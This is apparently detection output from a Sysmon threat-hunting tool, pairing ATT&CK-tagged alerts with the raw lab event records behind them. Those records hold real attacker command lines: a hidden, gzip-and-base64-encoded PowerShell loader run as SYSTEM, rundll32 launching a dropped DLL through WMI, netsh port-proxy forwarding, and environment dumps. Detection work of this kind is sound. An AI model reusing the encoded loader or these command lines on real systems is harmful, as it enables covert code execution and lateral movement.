+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:49:28.058
+ 365ABB72-55D8-5C91-0000-001060C90700
+ 3648
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9809
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:52.356
+ 365ABB72-AF8C-5CC8-0000-001003361900
+ 2484
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-2586-5CC9-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-AF8B-5CC8-0000-0010AC1B1900
+ 3872
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4949
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.357
+ 747F3D96-6646-5D3F-0000-0010A7398B00
+ 3868
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421227
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.776
+ 747F3D96-75D1-5F8B-0000-001088C23300
+ 2784
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 17590
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 01:29:00.318
+ 365ABB72-19E0-5CDA-0000-001006711000
+ 1932
+ C:\Windows\System32\mshta.exe
+ IEWIN7\IEUser
+ tcp
+ false
+ false
+ 10.0.2.16
+ IEWIN7
+ 49168
+
+ false
+ 10.0.2.17
+
+ 55683
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421227
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.776
+ 747F3D96-75D1-5F8B-0000-001088C23300
+ 2784
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421227
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.776
+ 747F3D96-75D1-5F8B-0000-001088C23300
+ 2784
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 56509
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-11-03 13:51:56.380
+ 747F3D96-DB7C-5DBE-0000-0010CF6B9502
+ 5004
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt
+ C:\Windows\system32\
+ MSEDGEWIN10\sqlsvc
+ 747F3D96-CE3B-5DBE-0000-00201ED50100
+ 0x1d51e
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-CE42-5DBE-0000-0010EE430200
+ 3936
+ C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
+ "c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 589975
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-12-15 15:00:14.470
+ 747F3D96-CF4B-5FD8-0000-00101AD58700
+ 6976
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10
+ 50008
+
+ false
+ 10.0.2.17
+ MSEDGEWIN10CLONE
+ 49666
+
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4948
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.355
+ 747F3D96-6646-5D3F-0000-001029398B00
+ 6760
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17589
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 01:29:04.293
+ 365ABB72-19E0-5CDA-0000-001006711000
+ 1932
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ C:\Windows\System32\mshta.exe -Embedding
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-19E0-5CDA-0000-0020CE701000
+ 0x1070ce
+ 0
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-965E-5CDA-0000-0010AF760000
+ 596
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17589
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 01:29:04.293
+ 365ABB72-19E0-5CDA-0000-001006711000
+ 1932
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ C:\Windows\System32\mshta.exe -Embedding
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-19E0-5CDA-0000-0020CE701000
+ 0x1070ce
+ 0
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-965E-5CDA-0000-0010AF760000
+ 596
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17589
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 01:29:04.293
+ 365ABB72-19E0-5CDA-0000-001006711000
+ 1932
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ C:\Windows\System32\mshta.exe -Embedding
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-19E0-5CDA-0000-0020CE701000
+ 0x1070ce
+ 0
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-965E-5CDA-0000-0010AF760000
+ 596
